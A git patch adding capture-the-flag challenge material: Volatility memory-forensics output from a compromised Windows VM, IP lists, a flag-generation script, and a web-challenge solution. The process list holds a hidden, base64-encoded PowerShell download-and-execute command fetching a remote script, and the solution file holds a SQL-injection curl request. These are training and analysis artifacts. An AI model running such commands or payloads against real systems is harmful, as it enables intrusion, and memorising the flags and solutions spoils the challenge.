From b3014e4977014b0f2a1960ff4e878464acc5d0f7 Mon Sep 17 00:00:00 2001 From: aaron Date: Thu, 2 Dec 2021 22:01:31 +0100 Subject: [PATCH] add forensics --- forensics/honeypot/connected_ips | 72 +++++++++++++++ forensics/honeypot/generate_flags.sh | 21 +++++ forensics/honeypot/test | 129 +++++++++++++++++++++++++++ forensics/honeypot/win_cmdline | 60 +++++++++++++ forensics/honeypot/win_netscan | 62 +++++++++++++ web/loesungsvorschlag | 2 + 6 files changed, 346 insertions(+) create mode 100644 forensics/honeypot/connected_ips create mode 100755 forensics/honeypot/generate_flags.sh create mode 100644 forensics/honeypot/test create mode 100644 forensics/honeypot/win_cmdline create mode 100644 forensics/honeypot/win_netscan create mode 100644 web/loesungsvorschlag diff --git a/forensics/honeypot/connected_ips b/forensics/honeypot/connected_ips new file mode 100644 index 0000000..b54c37a --- /dev/null +++ b/forensics/honeypot/connected_ips @@ -0,0 +1,72 @@ +0.0.0.0 +0.0.0.0 +10.0.2.15 +93.184.220.29 +10.0.2.15 +172.67.177.22 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +10.0.2.15 +0.0.0.0 +0.0.0.0 +10.0.2.15 +0.0.0.0 +10.0.2.15 +212.205.126.106 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +10.0.2.15 +10.0.2.15 +147.182.172.189 +10.0.2.15 +212.205.126.106 +10.0.2.15 +212.205.126.106 +0.0.0.0 +0.0.0.0 +127.0.0.1 +0.0.0.0 +0.0.0.0 +10.0.2.15 +212.205.126.106 +10.0.2.15 +204.79.197.203 +10.0.2.15 +95.100.210.141 +10.0.2.15 +212.205.126.106 +10.0.2.15 +212.205.126.106 +10.0.2.15 +172.67.177.22 +10.0.2.15 +95.100.210.141 diff --git a/forensics/honeypot/generate_flags.sh b/forensics/honeypot/generate_flags.sh new file mode 100755 index 0000000..636b329 --- /dev/null +++ b/forensics/honeypot/generate_flags.sh @@ -0,0 +1,21 @@ +#!/bin/bash + +list=( + 10.0.2.15 + 127.0.0.1 + 65.55.44.109 + 147.182.172.189 + 172.67.177.22 + 204.79.197.203 + 212.205.126.106 + 93.184.220.29 + 95.100.210.141 +) + + +for ip in ${list[@]}; do + echo Generating Flag from $ip: + echo "HTB{echo -n "https://windowsliveupdater.com/update.ps1_2700_$ip"|md5sum}" + echo "HTB{$(echo -n "https://windowsliveupdater.com/update.ps1_2700_$ip"|md5sum)}" +done + diff --git a/forensics/honeypot/test b/forensics/honeypot/test new file mode 100644 index 0000000..0704395 --- /dev/null +++ b/forensics/honeypot/test @@ -0,0 +1,129 @@ +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +65.55.44.109 +0.0.0.0 +0.0.0.0 +0.0.0.0 +10.0.2.15 +93.184.220.29 +10.0.2.15 +172.67.177.22 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +10.0.2.15 +0.0.0.0 +0.0.0.0 +10.0.2.15 +0.0.0.0 +10.0.2.15 +212.205.126.106 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +0.0.0.0 +10.0.2.15 +10.0.2.15 +147.182.172.189 +10.0.2.15 +212.205.126.106 +10.0.2.15 +212.205.126.106 +0.0.0.0 +0.0.0.0 +127.0.0.1 +0.0.0.0 +0.0.0.0 +10.0.2.15 +212.205.126.106 +10.0.2.15 +204.79.197.203 +10.0.2.15 +95.100.210.141 +10.0.2.15 +212.205.126.106 +10.0.2.15 +212.205.126.106 +10.0.2.15 +172.67.177.22 +10.0.2.15 +95.100.210.141 diff --git a/forensics/honeypot/win_cmdline b/forensics/honeypot/win_cmdline new file mode 100644 index 0000000..4c89fcc --- /dev/null +++ b/forensics/honeypot/win_cmdline @@ -0,0 +1,60 @@ +Volatility 3 Framework 1.0.1 + +PID Process Args + +4 System Required memory at 0x10 is not valid (process exited?) +236 smss.exe \SystemRoot\System32\smss.exe +308 csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 +348 wininit.exe wininit.exe +360 csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 +400 services.exe C:\Windows\system32\services.exe +408 lsass.exe C:\Windows\system32\lsass.exe +416 lsm.exe C:\Windows\system32\lsm.exe +496 winlogon.exe winlogon.exe +572 svchost.exe C:\Windows\system32\svchost.exe -k DcomLaunch +636 VBoxService.ex C:\Windows\System32\VBoxService.exe +692 svchost.exe C:\Windows\system32\svchost.exe -k RPCSS +744 svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted +848 svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted +888 svchost.exe C:\Windows\system32\svchost.exe -k netsvcs +1012 svchost.exe C:\Windows\system32\svchost.exe -k LocalService +1084 svchost.exe C:\Windows\system32\svchost.exe -k NetworkService +1208 spoolsv.exe C:\Windows\System32\spoolsv.exe +1252 svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork +1376 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature Heartbeat +1396 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature KvpExchange +1432 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature Shutdown +1440 taskhost.exe "taskhost.exe" +1504 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature TimeSync +1532 dwm.exe "C:\Windows\system32\Dwm.exe" +1540 vmicsvc.exe C:\Windows\system32\vmicsvc.exe -feature VSS +1556 explorer.exe C:\Windows\Explorer.EXE +1620 svchost.exe C:\Windows\System32\svchost.exe -k utcsvc +1716 VBoxTray.exe "C:\Windows\System32\VBoxTray.exe" +1872 cygrunsrv.exe "C:\Program Files\OpenSSH\bin\cygrunsrv.exe" +1956 wlms.exe C:\Windows\system32\wlms\wlms.exe +1612 cygrunsrv.exe Required memory at 0x7ffd9010 is not valid (process exited?) +1684 conhost.exe \??\C:\Windows\system32\conhost.exe "-57088940168010838710243314093101560802089520680-1936804963-2081634044-598129742 +1676 sshd.exe "C:\Program Files\OpenSSH\usr\sbin\sshd.exe" +1800 sppsvc.exe C:\Windows\system32\sppsvc.exe +2080 svchost.exe C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted +2360 SearchIndexer. C:\Windows\system32\SearchIndexer.exe /Embedding +2440 SearchProtocol "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" +2460 SearchFilterHo "C:\Windows\system32\SearchFilterHost.exe" 0 504 508 516 65536 512 +2616 csrss.exe %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 +2644 winlogon.exe winlogon.exe +2784 taskhost.exe "taskhost.exe" +2844 dwm.exe "C:\Windows\system32\Dwm.exe" +2856 explorer.exe C:\Windows\Explorer.EXE +3108 regsvr32.exe Required memory at 0x7ffd5010 is not valid (process exited?) +3504 VBoxTray.exe "C:\Windows\System32\VBoxTray.exe" +3112 WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe +3324 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" +3344 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3324 CREDAT:14337 +2700 powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA== +3732 conhost.exe \??\C:\Windows\system32\conhost.exe "288449379-1457209856-1923954052-101100547-172367320720102786213404402731845854479 +4028 whoami.exe Required memory at 0x7ffdf010 is not valid (process exited?) +4036 HOSTNAME.EXE Required memory at 0x7ffd7010 is not valid (process exited?) +2924 DumpIt.exe "C:\Users\Santa\Desktop\DumpIt.exe" +2920 conhost.exe \??\C:\Windows\system32\conhost.exe "280284285205075330588133904-110126809119471720131011406317-845024101-1158882802 +168 dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} diff --git a/forensics/honeypot/win_netscan b/forensics/honeypot/win_netscan new file mode 100644 index 0000000..02006f9 --- /dev/null +++ b/forensics/honeypot/win_netscan @@ -0,0 +1,62 @@ +Volatility 3 Framework 1.0.1 + +Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created + +0x23d04218 TCPv4 0.0.0.0 49155 0.0.0.0 0 LISTENING 400 services.exe N/A +0x23d04218 TCPv6 :: 49155 :: 0 LISTENING 400 services.exe N/A +0x2554b460 TCPv4 10.0.2.15 49226 93.184.220.29 80 ESTABLISHED - - - +0x261e9d30 TCPv4 10.0.2.15 49228 172.67.177.22 443 ESTABLISHED - - - +0x3e22f008 UDPv4 0.0.0.0 0 * 0 2080 svchost.exe 2021-11-25 19:12:23.000000 +0x3e22f008 UDPv6 :: 0 * 0 2080 svchost.exe 2021-11-25 19:12:23.000000 +0x3e238300 TCPv4 0.0.0.0 445 0.0.0.0 0 LISTENING 4 System N/A +0x3e238300 TCPv6 :: 445 :: 0 LISTENING 4 System N/A +0x3e24c588 UDPv4 0.0.0.0 0 * 0 2080 svchost.exe 2021-11-25 19:12:23.000000 +0x3e281368 UDPv4 10.0.2.15 138 * 0 4 System 2021-11-25 19:12:23.000000 +0x3e2a29b8 UDPv4 0.0.0.0 0 * 0 1084 svchost.exe 2021-11-25 19:12:23.000000 +0x3e2a29b8 UDPv6 :: 0 * 0 1084 svchost.exe 2021-11-25 19:12:23.000000 +0x3e2a6448 UDPv4 0.0.0.0 5355 * 0 1084 svchost.exe 2021-11-25 19:12:26.000000 +0x3e2b5b88 TCPv4 10.0.2.15 139 0.0.0.0 0 LISTENING 4 System N/A +0x3e2e9cc0 TCPv4 10.0.2.15 49221 212.205.126.106 443 ESTABLISHED - - - +0x3e354618 UDPv6 fe80::256b:4013:4140:453f 546 * 0 744 svchost.exe 2021-11-25 19:12:31.000000 +0x3e3b0c70 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000 +0x3e5e4f50 UDPv4 0.0.0.0 5355 * 0 1084 svchost.exe 2021-11-25 19:12:26.000000 +0x3e5e4f50 UDPv6 :: 5355 * 0 1084 svchost.exe 2021-11-25 19:12:26.000000 +0x3e5f77a0 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 1676 sshd.exe N/A +0x3e619578 TCPv4 0.0.0.0 49152 0.0.0.0 0 LISTENING 348 wininit.exe N/A +0x3e619578 TCPv6 :: 49152 :: 0 LISTENING 348 wininit.exe N/A +0x3e619cc0 TCPv4 0.0.0.0 49152 0.0.0.0 0 LISTENING 348 wininit.exe N/A +0x3e630008 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000 +0x3e630008 UDPv6 :: 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000 +0x3e630a20 TCPv4 0.0.0.0 49156 0.0.0.0 0 LISTENING 408 lsass.exe N/A +0x3e630a20 TCPv6 :: 49156 :: 0 LISTENING 408 lsass.exe N/A +0x3e648508 TCPv4 0.0.0.0 49153 0.0.0.0 0 LISTENING 744 svchost.exe N/A +0x3e648508 TCPv6 :: 49153 :: 0 LISTENING 744 svchost.exe N/A +0x3e6b92c0 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 692 svchost.exe N/A +0x3e6b92c0 TCPv6 :: 135 :: 0 LISTENING 692 svchost.exe N/A +0x3e6b9910 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 692 svchost.exe N/A +0x3e6f0bd8 TCPv4 0.0.0.0 49153 0.0.0.0 0 LISTENING 744 svchost.exe N/A +0x3e75f8e0 TCPv4 0.0.0.0 49154 0.0.0.0 0 LISTENING 888 svchost.exe N/A +0x3e762a40 TCPv4 0.0.0.0 49155 0.0.0.0 0 LISTENING 400 services.exe N/A +0x3e7686e8 TCPv4 0.0.0.0 49154 0.0.0.0 0 LISTENING 888 svchost.exe N/A +0x3e7686e8 TCPv6 :: 49154 :: 0 LISTENING 888 svchost.exe N/A +0x3e8611f0 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 1676 sshd.exe N/A +0x3e8611f0 TCPv6 :: 22 :: 0 LISTENING 1676 sshd.exe N/A +0x3e9be828 TCPv4 0.0.0.0 49156 0.0.0.0 0 LISTENING 408 lsass.exe N/A +0x3ed036c8 UDPv4 10.0.2.15 137 * 0 4 System 2021-11-25 19:12:23.000000 +0x3ee98d80 TCPv4 10.0.2.15 49229 147.182.172.189 4444 ESTABLISHED - - - +0x3f1b0df8 TCPv4 10.0.2.15 49216 212.205.126.106 443 ESTABLISHED - - - +0x3f225df8 TCPv4 10.0.2.15 49222 212.205.126.106 443 ESTABLISHED - - - +0x3f2cff50 UDPv4 0.0.0.0 0 * 0 - - 2021-11-25 19:13:04.000000 +0x3f2cff50 UDPv6 :: 0 * 0 - - 2021-11-25 19:13:04.000000 +0x3f4d7378 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000 +0x3f4dad28 UDPv4 127.0.0.1 58426 * 0 3344 iexplore.exe 2021-11-25 19:13:31.000000 +0x3f520ab8 UDPv4 0.0.0.0 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000 +0x3f520ab8 UDPv6 :: 0 * 0 2700 powershell.exe 2021-11-25 19:13:51.000000 +0x3f546de8 UDPv4 0.0.0.0 0 * 0 636 VBoxService.ex 2021-11-25 19:14:14.000000 +0x3f547008 TCPv4 10.0.2.15 49220 212.205.126.106 443 ESTABLISHED - - - +0x3f561438 TCPv4 10.0.2.15 49215 204.79.197.203 443 ESTABLISHED - - - +0x3f57c438 TCPv4 10.0.2.15 49218 95.100.210.141 443 ESTABLISHED - - - +0x3f58b4c8 TCPv4 10.0.2.15 49217 212.205.126.106 443 ESTABLISHED - - - +0x3f58c748 TCPv4 10.0.2.15 49223 212.205.126.106 443 ESTABLISHED - - - +0x3f58e9d8 TCPv4 10.0.2.15 49225 172.67.177.22 443 ESTABLISHED - - - +0x3f5c6df8 TCPv4 10.0.2.15 49219 95.100.210.141 443 ESTABLISHED - - - diff --git a/web/loesungsvorschlag b/web/loesungsvorschlag new file mode 100644 index 0000000..b05f853 --- /dev/null +++ b/web/loesungsvorschlag @@ -0,0 +1,2 @@ +curl -X POST 127.0.0.1:1337/api/submit -H 'Content-Type: application/json' -d +'{"query":"or 1=1"}'